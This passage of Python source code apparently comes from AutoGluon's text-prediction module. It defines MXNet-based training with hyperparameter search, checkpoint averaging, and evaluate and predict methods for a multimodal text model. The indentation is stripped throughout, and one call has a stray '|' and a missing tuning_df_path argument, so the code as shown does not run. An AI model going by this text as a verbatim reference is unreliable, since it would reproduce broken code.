return scorer._sign * scorer(ground_truth, predictions[:, 1])
else:
return scorer._sign * scorer(ground_truth, predictions)
@use_np
def train_function(args, reporter, train_df_path, tuning_df_path,
time_limit, time_start, base_config,
problem_type, column_types,
feature_columns, label_column,
log_metrics, eval_metric, ngpus_per_trial,
console_log, seed=None, verbosity=2):
"""
Parameters
----------
args
The arguments
reporter
Reporter of the HPO scheduler.
If it is set to None, we won't use the reporter and will just run a single trial.
train_df_path
Path of the training dataframe
tuning_df_path
Path of the tuning dataframe
time_limit
The time limit of calling this function
time_start
The starting timestamp of the experiment
base_config
Basic configuration
problem_type
Type of the problem.
column_types
Type of columns
feature_columns
The feature columns
label_column
Label column
log_metrics
Metrics for logging
eval_metric
The stopping metric
ngpus_per_trial
The number of GPUs to use per each trial
console_log
Whether to log it to console
seed
The random seed
verbosity
The verbosity
"""
import warnings
warnings.filterwarnings('ignore', module='mxnet')
warnings.filterwarnings('ignore', module='sklearn')
set_seed(seed)
is_fake_reporter = isinstance(reporter, FakeReporter)
if time_limit is not None:
start_train_tick = time.time()
time_left = time_limit - (start_train_tick - time_start)
if time_left <= 0:
if not is_fake_reporter:
reporter.terminate()
return
if is_fake_reporter:
search_space = args.rand
task_id = 0
else:
search_space = args['search_space']
task_id = args.task_id
# Get the log metric scorers
if isinstance(log_metrics, str):
log_metrics = [log_metrics]
# Load the training and tuning data from the parquet file
train_data = pd.read_pickle(train_df_path)
tuning_data = pd.read_pickle(tuning_df_path)
log_metric_scorers = [get_metric(ele) for ele in log_metrics]
eval_metric_scorer = get_metric(eval_metric)
greater_is_better = eval_metric_scorer.greater_is_better
cfg = base_config.clone()
specified_values = []
for key in search_space.keys():
specified_values.append(key)
specified_values.append(search_space[key])
cfg.merge_from_list(specified_values)
exp_dir = cfg.misc.exp_dir
exp_dir = os.path.join(exp_dir, 'task{}'.format(task_id))
os.makedirs(exp_dir, exist_ok=True)
cfg.defrost()
cfg.misc.exp_dir = exp_dir
cfg.freeze()
logger = logging.getLogger()
set_logger_verbosity(verbosity, logger)
logging_config(folder=exp_dir, name='training', logger=logger, console=console_log,
level=logging.DEBUG,
console_level=verbosity2loglevel(verbosity))
logger.log(10, cfg)
# Load backbone model
backbone_model_cls, backbone_cfg, tokenizer, backbone_params_path, _ \
= get_backbone(cfg.model.backbone.name)
if 'roberta' in cfg.model.backbone.name:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg, return_all_hiddens=True)
else:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg)
# Build Preprocessor + Preprocess the training dataset + Inference problem type
# TODO Dynamically cache the preprocessor that has been fitted.
if problem_type == MULTICLASS or problem_type == BINARY:
label_generator = LabelEncoder()
label_generator.fit(pd.concat([train_data[label_column], tuning_data[label_column]]))
else:
label_generator = None
preprocessor = MultiModalTextFeatureProcessor(column_types=column_types,
label_column=label_column,
tokenizer_name=cfg.model.backbone.name,
label_generator=label_generator,
cfg=cfg.preprocessing)
logger.info('Fitting and transforming the train data...')
train_dataset = preprocessor.fit_transform(train_data[feature_columns],
train_data[label_column])
with open(os.path.join(exp_dir, 'preprocessor.pkl'), 'wb') as of:
pickle.dump(preprocessor, of)
logger.info(f'Done! Preprocessor saved to {os.path.join(exp_dir, "preprocessor.pkl")}')
logger.log(10, 'Train Data')
logger.log(10, get_stats_string(preprocessor, train_dataset, is_train=True))
logger.info('Process dev set...')
tuning_dataset = preprocessor.transform(tuning_data[feature_columns],
tuning_data[label_column])
logger.info('Done!')
# Auto Max Length
if cfg.preprocessing.text.auto_max_length:
max_length = auto_shrink_max_length(
train_dataset,
insert_sep=cfg.model.insert_sep,
num_text_features=len(preprocessor.text_feature_names),
auto_max_length_quantile=cfg.preprocessing.text.auto_max_length_quantile,
round_to=cfg.preprocessing.text.auto_max_length_round_to,
max_length=cfg.preprocessing.text.max_length)
else:
max_length = cfg.preprocessing.text.max_length
train_stochastic_chunk = cfg.model.train_stochastic_chunk
test_stochastic_chunk = cfg.model.test_stochastic_chunk
inference_num_repeat = cfg.model.inference_num_repeat
if max_length < cfg.preprocessing.text.max_length:
inference_num_repeat = 1
cfg.defrost()
cfg.preprocessing.text.max_length = max_length
cfg.model.inference_num_repeat = inference_num_repeat
cfg.freeze()
with open(os.path.join(exp_dir, 'cfg.yml'), 'w') as f:
f.write(str(cfg))
logger.info(f'Max length for chunking text: {max_length}, '
f'Stochastic chunk: Train-{train_stochastic_chunk}/Test-{test_stochastic_chunk}, '
f'Test #repeat: {inference_num_repeat}.')
cls_id, sep_id = get_cls_sep_id(tokenizer)
train_batchify_fn = MultiModalTextBatchify(
num_text_inputs=len(preprocessor.text_feature_names),
num_categorical_inputs=len(preprocessor.categorical_feature_names),
num_numerical_inputs=len(preprocessor.numerical_feature_names) > 0,
cls_token_id=cls_id, sep_token_id=sep_id, max_length=max_length,
mode='train', stochastic_chunk=train_stochastic_chunk,
insert_sep=cfg.model.insert_sep)
test_batchify_fn = MultiModalTextBatchify(
num_text_inputs=len(preprocessor.text_feature_names),
num_categorical_inputs=len(preprocessor.categorical_feature_names),
num_numerical_inputs=len(preprocessor.numerical_feature_names) > 0,
cls_token_id=cls_id, sep_token_id=sep_id, max_length=max_length,
mode='test', stochastic_chunk=test_stochastic_chunk,
insert_sep=cfg.model.insert_sep)
# Get the ground-truth dev labels
gt_dev_labels = np.array([ele[-1] for ele in tuning_dataset])
if problem_type == REGRESSION:
gt_dev_labels = preprocessor.label_scaler.inverse_transform(np.expand_dims(gt_dev_labels,
axis=-1))[:, 0]
ctx_l = get_mxnet_available_ctx()
if ngpus_per_trial == 0:
ctx_l = [mx.cpu()]
else:
ctx_l = ctx_l[:ngpus_per_trial]
base_batch_size = cfg.optimization.per_device_batch_size
num_accumulated = int(np.ceil(cfg.optimization.batch_size / (base_batch_size * len(ctx_l))))
inference_base_batch_size = base_batch_size * cfg.optimization.val_batch_size_mult
train_dataloader = DataLoader(train_dataset,
batch_size=base_batch_size,
shuffle=True,
batchify_fn=train_batchify_fn)
dev_dataloader = DataLoader(tuning_dataset,
batch_size=inference_base_batch_size,
shuffle=False,
batchify_fn=test_batchify_fn)
if problem_type == REGRESSION:
out_shape = 1
elif problem_type == MULTICLASS:
out_shape = len(label_generator.classes_)
elif problem_type == BINARY:
assert len(label_generator.classes_) == 2
out_shape = 2
else:
raise NotImplementedError
net = MultiModalWithPretrainedTextNN(
text_backbone=text_backbone,
num_text_features=1,
num_categorical_features=len(preprocessor.categorical_feature_names),
num_numerical_features=len(preprocessor.numerical_feature_names) > 0,
numerical_input_units=None if len(preprocessor.numerical_feature_names) == 0 else len(preprocessor.numerical_feature_names),
num_categories=preprocessor.categorical_num_categories,
get_embedding=False,
cfg=cfg.model.network,
out_shape=out_shape)
net.initialize_with_pretrained_backbone(backbone_params_path, ctx=ctx_l)
net.hybridize()
num_total_params, num_total_fixed_params = count_parameters(net.collect_params())
logger.info('#Total Params/Fixed Params={}/{}'.format(num_total_params,
num_total_fixed_params))
# Initialize the optimizer
updates_per_epoch = int(np.ceil(len(train_dataloader) / (num_accumulated * len(ctx_l))))
optimizer, optimizer_params, max_update \
= get_optimizer(cfg.optimization,
updates_per_epoch=updates_per_epoch)
valid_interval = int(math.ceil(cfg.optimization.valid_frequency * updates_per_epoch))
train_log_interval = int(math.ceil(cfg.optimization.log_frequency * updates_per_epoch))
if 0 < cfg.optimization.layerwise_lr_decay < 1:
apply_layerwise_decay(net.text_backbone,
cfg.optimization.layerwise_lr_decay,
backbone_name=cfg.model.backbone.name)
freeze_layers(net.text_backbone,
backbone_name=cfg.model.backbone.name,
num_trainable_layers=cfg.model.num_trainable_layers)
# Do not apply weight decay to all the LayerNorm and bias
for _, v in net.collect_params('.*beta|.*gamma|.*bias').items():
v.wd_mult = 0.0
params = [p for p in net.collect_params().values() if p.grad_req != 'null']
trainer = mx.gluon.Trainer(params,
optimizer, optimizer_params,
update_on_kvstore=False)
# Set grad_req if gradient accumulation is required
if num_accumulated > 1:
logger.log(15, 'Using gradient accumulation.'
' Global batch size = {}'.format(cfg.optimization.batch_size))
for p in params:
p.grad_req = 'add'
net.collect_params().zero_grad()
train_loop_dataloader = grouper(repeat(train_dataloader), len(ctx_l))
log_loss_l = [mx.np.array(0.0, dtype=np.float32, ctx=ctx) for ctx in ctx_l]
log_num_samples_l = [0 for _ in ctx_l]
logging_start_tick = time.time()
nbest = cfg.optimization.nbest
best_performance_score = [] # Stores the best performing checkpoints
best_performance_update_idx = [] # Stores the update index that reached the best validation performance
best_score = None
mx.npx.waitall()
no_better_rounds = 0
report_idx = 0
start_tick = time.time()
if time_limit is not None:
time_limit -= start_tick - time_start
if time_limit <= 0:
if not is_fake_reporter:
reporter.terminate()
return
best_report_items = None
report_local_jsonl_f = open(os.path.join(exp_dir, 'results_local.jsonl'), 'w')
logger.info(f'Local training results will be saved to '
f'{os.path.join(exp_dir, "results_local.jsonl")}.')
for update_idx in range(max_update):
for accum_idx in range(num_accumulated):
sample_l = next(train_loop_dataloader)
loss_l = []
for i, (sample, ctx) in enumerate(zip(sample_l, ctx_l)):
feature_batch, label_batch = sample
feature_batch = move_to_ctx(feature_batch, ctx)
label_batch = move_to_ctx(label_batch, ctx)
with mx.autograd.record():
pred = net(feature_batch)
if problem_type == MULTICLASS or problem_type == BINARY:
logits = mx.npx.log_softmax(pred, axis=-1)
loss = - mx.npx.pick(logits,
mx.np.expand_dims(label_batch, axis=-1))
elif problem_type == REGRESSION:
loss = mx.np.square(pred - mx.np.expand_dims(label_batch, axis=-1))
loss_l.append(loss.mean() / len(ctx_l) / num_accumulated)
log_loss_l[i] += loss_l[i] * len(ctx_l) * loss.shape[0] * num_accumulated
log_num_samples_l[i] += loss.shape[0]
for loss in loss_l:
loss.backward()
# Begin to update
trainer.allreduce_grads()
total_norm, ratio, is_finite = clip_grad_global_norm(params, cfg.optimization.max_grad_norm)
if not cfg.model._disable_update:
trainer.update(1.0, ignore_stale_grad=True)
# Clear after update
if num_accumulated > 1:
net.collect_params().zero_grad()
if (update_idx + 1) % train_log_interval == 0:
log_loss = sum([ele.as_in_ctx(ctx_l[0]) for ele in log_loss_l]).asnumpy()
log_num_samples = sum(log_num_samples_l)
logger.log(15,
'[Iter {}/{}, Epoch {}] train loss={:0.2e}, gnorm={:0.2e}, lr={:0.2e}, #samples processed={},'
' #sample per second={:.2f}. ETA={:.2f}min'
.format(update_idx + 1, max_update,
int(update_idx / updates_per_epoch),
log_loss / log_num_samples, total_norm, trainer.learning_rate,
log_num_samples,
log_num_samples / (time.time() - logging_start_tick),
(time.time() - start_tick) / (update_idx + 1)
* (max_update - update_idx - 1) / 60))
logging_start_tick = time.time()
log_loss_l = [mx.np.array(0.0, dtype=np.float32, ctx=ctx) for ctx in ctx_l]
log_num_samples_l = [0 for _ in ctx_l]
if (update_idx + 1) % valid_interval == 0 or (update_idx + 1) == max_update:
valid_start_tick = time.time()
dev_predictions = \
_classification_regression_predict(net,
dataloader=dev_dataloader,
problem_type=problem_type,
label_scaler=preprocessor.label_scaler,
has_label=False,
num_repeat=inference_num_repeat)
log_scores = [calculate_metric(scorer, gt_dev_labels,
dev_predictions,
problem_type)
for scorer in log_metric_scorers]
dev_score = calculate_metric(eval_metric_scorer, gt_dev_labels,
dev_predictions,
problem_type)
valid_time_spent = time.time() - valid_start_tick
find_better = False
find_topn_better = False
if len(best_performance_score) < nbest:
best_performance_score.append(dev_score)
best_performance_update_idx.append(update_idx + 1)
net.save_parameters(
os.path.join(exp_dir,
f'nbest_model{len(best_performance_score) - 1}.params'))
find_topn_better = True
if best_score is None or greater_is_better and dev_score >= best_score\
or (not greater_is_better and dev_score <= best_score):
find_better = True
net.save_parameters(os.path.join(exp_dir, f'best_model.params'))
best_score = dev_score
else:
# First try to update the top-K
if greater_is_better:
if dev_score >= min(best_performance_score):
find_topn_better = True
replace_idx = np.argmin(best_performance_score)
best_performance_score[replace_idx] = dev_score
best_performance_update_idx[replace_idx] = update_idx + 1
net.save_parameters(
os.path.join(exp_dir, f'nbest_model{replace_idx}.params'))
if dev_score >= best_score:
find_better = True
net.save_parameters(os.path.join(exp_dir, f'best_model.params'))
best_score = dev_score
else:
if dev_score <= max(best_performance_score):
find_topn_better = True
replace_idx = np.argmax(best_performance_score)
best_performance_score[replace_idx] = dev_score
best_performance_update_idx[replace_idx] = update_idx + 1
net.save_parameters(
os.path.join(exp_dir, f'nbest_model{replace_idx}.params'))
if dev_score <= best_score:
find_better = True
net.save_parameters(os.path.join(exp_dir, f'best_model.params'))
best_score = dev_score
if not find_better:
no_better_rounds += 1
else:
no_better_rounds = 0
mx.npx.waitall()
loss_string = ', '.join(['{}={:0.4e}'.format(metric.name, score)
for score, metric in zip(log_scores, log_metric_scorers)])
logger.log(25, '[Iter {}/{}, Epoch {}] valid {}, time spent={:.3f}s,'
' total time spent={:.2f}min. Find new best={}, Find new top-{}={}'.format(
update_idx + 1, max_update, int(update_idx / updates_per_epoch),
loss_string, valid_time_spent, (time.time() - start_tick) / 60,
find_better, nbest, find_topn_better))
if reporter is not None:
report_items = [('iteration', update_idx + 1),
('report_idx', report_idx + 1),
('epoch', int(update_idx / updates_per_epoch))] + \
[(metric.name, score)
for score, metric in zip(log_scores, log_metric_scorers)] + \
[('find_better', find_better),
('find_new_topn', find_topn_better),
('nbest_stat', json.dumps([best_performance_score,
best_performance_update_idx])),
('elapsed_time', int(time.time() - start_tick))]
if eval_metric_scorer._sign < 0:
report_items.append(('reward_attr', -dev_score))
else:
report_items.append(('reward_attr', dev_score))
report_items.append(('eval_metric', eval_metric_scorer.name))
report_items.append(('exp_dir', exp_dir))
if find_better:
best_report_items = report_items
reporter(**dict(report_items))
report_local_jsonl_f.write(json.dumps(dict(report_items)) + '\n')
report_local_jsonl_f.flush()
report_idx += 1
if no_better_rounds >= cfg.optimization.early_stopping_patience:
logger.info('Early stopping patience reached!')
break
total_time_spent = time.time() - start_tick
if time_limit is not None and total_time_spent > time_limit:
break
# Average checkpoints
best_report_items_dict = dict(best_report_items)
best_report_items_dict['report_idx'] = report_idx + 1
reporter(**best_report_items_dict)
report_local_jsonl_f.write(json.dumps(best_report_items_dict) + '\n')
report_local_jsonl_f.close()
def get_recommended_resource(nthreads_per_trial=None,
ngpus_per_trial=None) -> Tuple[int, int]:
"""Get the recommended resources.
Internally, we will try to use GPU whenever it's possible. That means, we will use
a single GPU for finetuning.
Parameters
----------
nthreads_per_trial
The number of threads per trial provided by the user.
ngpus_per_trial
The number of GPUs per trial provided by the user.
Returns
-------
nthreads_per_trial
The recommended resource.
ngpus_per_trial
"""
if nthreads_per_trial is None and ngpus_per_trial is None:
nthreads_per_trial = get_cpu_count()
ngpus_per_trial = 1
elif nthreads_per_trial is not None and ngpus_per_trial is None:
ngpus_per_trial = 1
elif nthreads_per_trial is None and ngpus_per_trial is not None:
if ngpus_per_trial != 0:
num_parallel_jobs = get_gpu_count() // ngpus_per_trial
nthreads_per_trial = max(get_cpu_count() // num_parallel_jobs, 1)
else:
nthreads_per_trial = get_cpu_count()
nthreads_per_trial = min(nthreads_per_trial, get_cpu_count())
ngpus_per_trial = min(ngpus_per_trial, get_gpu_count())
assert nthreads_per_trial > 0 and ngpus_per_trial >= 0,\
'Invalid number of threads and number of GPUs.'
return nthreads_per_trial, ngpus_per_trial
@use_np
class MultiModalTextModel:
"""Learner of the multimodal text data.
It will be called if the user call `fit()` in TextPredictor.
It is used for making predictions on new data and viewing information about
models trained during `fit()`.
"""
def __init__(self, column_types,
feature_columns,
label_columns,
problem_type,
eval_metric,
log_metrics,
output_directory=None):
"""Creates model object.
Parameters
----------
column_types
The column types.
feature_columns
Name of the feature columns
label_columns
Name of the label columns.
problem_type
Type of the problem
eval_metric
The evaluation metric
log_metrics
The metrics for logging
output_directory
The output directory to save the model
logger
The logger
"""
super(MultiModalTextModel, self).__init__()
self._base_config = base_cfg()
self._base_config.defrost()
if output_directory is not None:
self._output_directory = self._base_config.misc.exp_dir = output_directory
self._base_config.misc.exp_dir = os.path.abspath(self._base_config.misc.exp_dir)
self._base_config.freeze()
self._output_directory = self._base_config.misc.exp_dir
self._column_types = column_types
self._eval_metric = eval_metric
self._log_metrics = log_metrics
self._label_columns = label_columns
self._feature_columns = feature_columns
self._problem_type = problem_type
# Need to be set in the train call
self._net = None # Network for training and inference
self._embed_net = None # Network for extract the embedding
self._config = None
self._results = None
self._preprocessor = None
@property
def results(self):
return self._results
@property
def preprocessor(self):
return self._preprocessor
@property
def output_directory(self):
""" Get the output directory. The trained model and the training logs
will be saved to this folder """
return self._output_directory
@property
def label_columns(self):
"""Name of the label columns"""
return self._label_columns
@property
def problem_type(self):
"""Types of the problem"""
return self._problem_type
@property
def feature_columns(self):
"""Name of the features"""
return self._feature_columns
@property
def base_config(self):
"""The basic configuration. Internally, we will fill values in the base config by values
in the search space."""
return self._base_config
@property
def results(self):
"""Results of the final model"""
return self._results
@property
def config(self):
"""The configuration of the final trained model."""
return self._config
@property
def net(self):
return self._net
def train(self, train_data, tuning_data,
num_cpus=None,
num_gpus=None,
time_limit=None,
tune_kwargs=None,
search_space=None,
plot_results=False,
console_log=True,
seed=None,
verbosity=2):
"""The train function.
Parameters
----------
train_data
The training data
tuning_data
The tuning data
num_cpus
Number of CPUs for each trial
num_gpus
Number of GPUs for each trial
time_limit
The time limits
tune_kwargs
Parameters of the HPO algorithms. For example, the scheduling
algorithm, scheduling backend, HPO algorithm.
search_space
The search space options
plot_results
Whether to plot results or not
console_log
Whether to log into the console
seed
The seed
verbosity
Verbosity
"""
set_seed(seed)
set_logger_verbosity(verbosity, logger)
start_tick = time.time()
assert len(self._label_columns) == 1, 'Currently, we only support single label.'
# TODO(sxjscience) Try to support S3
os.makedirs(self._output_directory, exist_ok=True)
if search_space is None:
search_space = \
ag_text_presets.create('default')['models']['MultimodalTextModel']['search_space']
search_space_reg = args(search_space=space.Dict(**search_space))
# Scheduler and searcher for HPO
if tune_kwargs is None:
tune_kwargs = ag_text_presets.create('default')['tune_kwargs']
scheduler_options = tune_kwargs['scheduler_options']
num_cpus, num_gpus = get_recommended_resource(num_cpus, num_gpus)
if num_gpus == 0:
if 'AUTOGLUON_TEXT_TRAIN_WITHOUT_GPU' in os.environ:
use_warning = int(os.environ['AUTOGLUON_TEXT_TRAIN_WITHOUT_GPU'])
else:
use_warning = False
if use_warning:
warnings.warn('No GPU is detected in the machine and we will recommend you to '
'use TextPredictor on a GPU-enabled instance. Currently, '
'training on CPU is slow.')
else:
raise RuntimeError('No GPU is detected in the machine and we will '
'not proceed to run TextPredictor because they will train '
'too slowly with only CPU. You may try to set `ngpus_per_trial` '
'to a number larger than 0 when calling `.fit()`. '
'Also, you can set the environment variable '
'"AUTOGLUON_TEXT_TRAIN_WITHOUT_GPU=1" to force the model to '
'use CPU for training.')
logger.info(f"The GluonNLP V0 backend is used. "
f"We will use {num_cpus} cpus and "
f"{num_gpus} gpus to train each trial.")
if scheduler_options is None:
scheduler_options = dict()
if plot_results is None:
if in_ipynb():
plot_results = True
else:
plot_results = False
scheduler_options = compile_scheduler_options_v2(
scheduler_options=scheduler_options,
scheduler=tune_kwargs['search_strategy'],
search_strategy=tune_kwargs['searcher'],
search_options=tune_kwargs['search_options'],
nthreads_per_trial=num_cpus,
ngpus_per_trial=num_gpus,
checkpoint=os.path.join(self._output_directory, 'checkpoint.ag'),
num_trials=tune_kwargs['num_trials'],
time_out=time_limit,
resume=False,
visualizer=scheduler_options.get('visualizer'),
time_attr='report_idx',
reward_attr='reward_attr',
dist_ip_addrs=scheduler_options.get('dist_ip_addrs'))
# Create a temporary cache file. The internal train function will load the
# temporary cache.
os.makedirs(os.path.join(self._output_directory, 'data_cache'), exist_ok=True)
train_df_path = os.path.join(self._output_directory, 'data_cache',
'cache_train_dataframe.pd.pkl')
tuning_df_path = os.path.join(self._output_directory, 'data_cache',
'cache_tuning_dataframe.pd.pkl')
train_data.to_pickle(train_df_path)
tuning_data.to_pickle(tuning_df_path)
train_fn = search_space_reg(functools.partial(train_function,
train_df_path=train_df_path, | base_config=self.base_config,
problem_type=self.problem_type,
column_types=self._column_types,
feature_columns=self._feature_columns,
label_column=self._label_columns[0],
log_metrics=self._log_metrics,
eval_metric=self._eval_metric,
ngpus_per_trial=scheduler_options['resource']['num_gpus'],
console_log=console_log,
verbosity=verbosity))
no_job_finished_err_msg =\
'No training job has been completed! '\
'There are two possibilities: '\
'1) The time_limit is too small, '\
'or 2) There are some internal errors in AutoGluon. '\
'For the first case, you can increase the time_limit or set it to '\
'None, e.g., setting "predictor.fit(..., time_limit=None). To '\
'further investigate the root cause, you can also try to set the '\
'"verbosity=3" and try again, i.e., predictor.set_verbosity(3).'
if scheduler_options['num_trials'] == 1:
train_fn(train_fn.args['search_space'],
train_fn.args['_default_config'])
best_model_saved_dir_path = os.path.join(self._output_directory, 'task0')
cfg_path = os.path.join(self._output_directory, 'task0', 'cfg.yml')
# Check whether the job has finished
if not os.path.exists(cfg_path)\
or not os.path.exists(os.path.join(self._output_directory,
'task0', 'best_model.params')):
raise RuntimeError(no_job_finished_err_msg)
cfg = self.base_config.clone_merge(cfg_path)
local_results = pd.read_json(os.path.join(self._output_directory, 'task0',
'results_local.jsonl'), lines=True)
if plot_results:
plot_training_curves = os.path.join(self._output_directory,
'plot_training_curves.png')
import matplotlib.pyplot as plt
plt.ylabel(self._eval_metric)
plt.xlabel('report_idx')
plt.title("Performance vs Training-Time")
plt.plot(local_results['report_idx'].iloc[:-1],
local_results[local_results['eval_metric'][0]].iloc[:-1], label=f'task0')
plt.legend(loc='best')
plt.savefig(plot_training_curves)
plt.show()
self._results = local_results
else:
if tune_kwargs['search_strategy'] != 'local':
# Force forkserver if it's not using the local sequential HPO
force_forkserver()
scheduler_cls, scheduler_params = scheduler_factory(scheduler_options)
# Create scheduler, run HPO experiment
scheduler = scheduler_cls(train_fn, **scheduler_options)
scheduler.run()
scheduler.join_jobs()
if len(scheduler.config_history) == 0:
raise RuntimeError(no_job_finished_err_msg)
best_config = scheduler.get_best_config()
logger.info('Results=', scheduler.searcher._results)
logger.info('Best_config={}'.format(best_config))
best_task_id = scheduler.get_best_task_id()
best_model_saved_dir_path = os.path.join(self._output_directory,
'task{}'.format(best_task_id))
best_cfg_path = os.path.join(best_model_saved_dir_path, 'cfg.yml')
cfg = self.base_config.clone_merge(best_cfg_path)
if plot_results:
plot_training_curves = os.path.join(self._output_directory,
'plot_training_curves.png')
scheduler.get_training_curves(filename=plot_training_curves,
plot=plot_results,
use_legend=True)
self._results = dict()
self._results.update(best_reward=scheduler.get_best_reward(),
best_config=scheduler.get_best_config(),
total_time=time.time() - start_tick,
metadata=scheduler.metadata,
training_history=scheduler.training_history,
config_history=scheduler.config_history,
reward_attr=scheduler._reward_attr,
config=cfg)
# Consider to move this to a separate predictor
self._config = cfg
# Average parameters
# TODO(sxjscience) Clean up the temporary spaces used to store the intermediate checkpoints.
if cfg.model.use_avg_nbest:
nbest_path_l = []
for best_id in range(cfg.optimization.nbest):
nbest_path = os.path.join(best_model_saved_dir_path, f'nbest_model{best_id}.params')
if os.path.exists(nbest_path):
nbest_path_l.append(nbest_path)
avg_nbest_path = os.path.join(best_model_saved_dir_path, 'nbest_model_avg.params')
average_checkpoints(nbest_path_l, avg_nbest_path)
with open(os.path.join(best_model_saved_dir_path, 'preprocessor.pkl'), 'rb') as in_f:
self._preprocessor = pickle.load(in_f)
backbone_model_cls, backbone_cfg, tokenizer, backbone_params_path, _ \
= get_backbone(cfg.model.backbone.name)
if 'roberta' in cfg.model.backbone.name:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg, return_all_hiddens=True)
else:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg)
if self._problem_type == REGRESSION:
out_shape = 1
elif self._problem_type == MULTICLASS:
out_shape = len(self._preprocessor.label_generator.classes_)
elif self._problem_type == BINARY:
assert len(self._preprocessor.label_generator.classes_) == 2
out_shape = 2
else:
raise NotImplementedError
net = MultiModalWithPretrainedTextNN(
text_backbone=text_backbone,
num_text_features=1,
num_categorical_features=len(self._preprocessor.categorical_feature_names),
num_numerical_features=len(self._preprocessor.numerical_feature_names) > 0,
numerical_input_units=None if len(self._preprocessor.numerical_feature_names) == 0 else len(
self._preprocessor.numerical_feature_names),
num_categories=self._preprocessor.categorical_num_categories,
get_embedding=False,
cfg=cfg.model.network,
out_shape=out_shape)
net.hybridize()
if cfg.model.use_avg_nbest:
net.load_parameters(avg_nbest_path, ctx=mx.cpu())
else:
net.load_parameters(os.path.join(best_model_saved_dir_path, 'best_model.params'),
ctx=mx.cpu())
self._net = net
mx.npx.waitall()
def evaluate(self, data, metrics=None, stochastic_chunk=None, num_repeat=None):
""" Report the predictive performance evaluated for a given dataset.
Parameters
----------
data : str or :class:`TabularDataset` or `pandas.DataFrame`
This Dataset must also contain the label-column with the same column-name as specified during `fit()`.
If str is passed, `valid_data` will be loaded using the str value as the file path.
metrics : str or List[str] or None
Name of metric or a list of names of metrics to report.
If it is not given, we will return the score of the stored eval_metric.
stochastic_chunk
Whether to use stochastic chunk
num_repeat
The number of repeats
Returns
-------
ret : single number or a dict of metric --> metric scores
Output
"""
if isinstance(metrics, str):
metrics = [metrics]
elif metrics is None:
metrics = [self._eval_metric]
assert self.net is not None
# We will always use all resources that are available for evaluation
ctx_l = get_mxnet_available_ctx()
self.net.collect_params().reset_ctx(ctx_l)
if not isinstance(data, pd.DataFrame):
if isinstance(data, (list, dict)):
data = pd.DataFrame(data)
elif isinstance(data, str):
data = load_pd.load(data)
else:
raise NotImplementedError(f'The format of data is not understood. '
f'We have type(data)="{type(data)}"')
data = data[self._feature_columns + self._label_columns]
if self._problem_type == MULTICLASS or self._problem_type == BINARY:
ground_truth = self.preprocessor.label_generator.transform(
data[self._label_columns[0]])
predictions = self.predict_proba(data,
stochastic_chunk=stochastic_chunk,
num_repeat=num_repeat)
else:
ground_truth = pd.to_numeric(data[self._label_columns[0]]).to_numpy().astype(np.float32)
predictions = self.predict(data,
stochastic_chunk=stochastic_chunk,
num_repeat=num_repeat)
metric_scores = [calculate_metric(get_metric(metric),
ground_truth, predictions, self._problem_type)
for metric in metrics]
# Once the inference is completed, we will cache all parameters back
# to CPU to avoid memory overflow.
self.net.collect_params().reset_ctx(mx.cpu())
if len(metric_scores) == 1:
return metric_scores[0]
else:
return {metric: score for metric, score in zip(metrics, metric_scores)}
def _internal_predict(self, data, get_original_labels=True, get_probabilities=False,
stochastic_chunk=None, num_repeat=None):
assert self.net is not None
assert self.config is not None
# We will always use all resources that are available for evaluation
ctx_l = get_mxnet_available_ctx()
self.net.collect_params().reset_ctx(ctx_l)
if not isinstance(data, pd.DataFrame):
if isinstance(data, (list, dict)):
data = pd.DataFrame(data)
elif isinstance(data, str):
data = load_pd.load(data)
else:
raise NotImplementedError(f'The format of data is not understood. '
f'We have type(data)="{type(data)}"')
dataset = self.preprocessor.transform(data[self._feature_columns])
inference_batch_size = self.config.optimization.per_device_batch_size \
* self.config.optimization.val_batch_size_mult
cls_id, sep_id = get_cls_sep_id(self.preprocessor.tokenizer)
if stochastic_chunk is None:
stochastic_chunk = self.config.model.test_stochastic_chunk
batchify_fn = MultiModalTextBatchify(
num_text_inputs=len(self.preprocessor.text_feature_names),
num_categorical_inputs=len(self.preprocessor.categorical_feature_names),
num_numerical_inputs=len(self.preprocessor.numerical_feature_names) > 0,
cls_token_id=cls_id, sep_token_id=sep_id,
max_length=self.config.preprocessing.text.max_length,
mode='test',
stochastic_chunk=stochastic_chunk,
insert_sep=self.config.model.insert_sep)
dataloader = DataLoader(dataset,
batch_size=inference_batch_size,
shuffle=False,
batchify_fn=batchify_fn)
if num_repeat is None:
num_repeat = self.config.model.inference_num_repeat
test_predictions = _classification_regression_predict(
self._net,
dataloader=dataloader,
problem_type=self._problem_type,
label_scaler=self.preprocessor.label_scaler,
has_label=False,
num_repeat=num_repeat)
# Once the inference is completed, we will cache all parameters back
# to CPU to avoid memory overflow.
self.net.collect_params().reset_ctx(mx.cpu())
if self._problem_type == MULTICLASS or self._problem_type == BINARY:
if get_probabilities:
return test_predictions
else:
test_predictions = test_predictions.argmax(axis=-1)
if get_original_labels:
test_predictions = np.array(
self.preprocessor.label_generator.inverse_transform(test_predictions))
return test_predictions
@property
def class_labels(self):
"""The original name of the class labels.
For example, the tabular data may contain classes equal to
"entailment", "contradiction", "neutral". Internally, these will be converted to
0, 1, 2, ...
This function returns the original names of these raw labels.
Returns
-------
ret
List that contain the class names. It will be None if it's not a classification problem.
"""
if self.problem_type == MULTICLASS or self.problem_type == BINARY:
return self._preprocessor.label_generator.classes_
else:
warnings.warn('Accessing class names for a non-classification problem. Return None.')
return None
def predict_proba(self, test_data, stochastic_chunk=None, num_repeat=None):
"""Predict class probabilities instead of class labels (for classification tasks).
Parameters
----------
test_data : `pandas.DataFrame`, `autogluon.tabular.TabularDataset`, or str
The test data to get predictions for. Can be DataFrame/Dataset or a file that can
be loaded into DataFrame/Dataset.
stochastic_chunk : bool
Whether to enable stochastic chunk
num_repeat : int or None
The number of repeats for running the inference model.
Returns
-------
probabilities : array
The predicted class probabilities for each sample.
Shape of this array is (#Samples, num_class).
Here, the i-th number means the probability of belonging to the i-th class.
You can access the class names by calling `self.class_names`.
"""
assert self.problem_type == MULTICLASS or self.problem_type == BINARY
return self._internal_predict(test_data,
get_original_labels=False,
get_probabilities=True,
stochastic_chunk=stochastic_chunk,
num_repeat=num_repeat)
def predict(self, test_data, get_original_labels=True, stochastic_chunk=None, num_repeat=None):
"""Make predictions on new data.
Parameters
----------
test_data : `pandas.DataFrame`, `autogluon.tabular.TabularDataset`, or str
The test data to get predictions for. Can be DataFrame/Dataset or a file that can be loaded into DataFrame/Dataset.
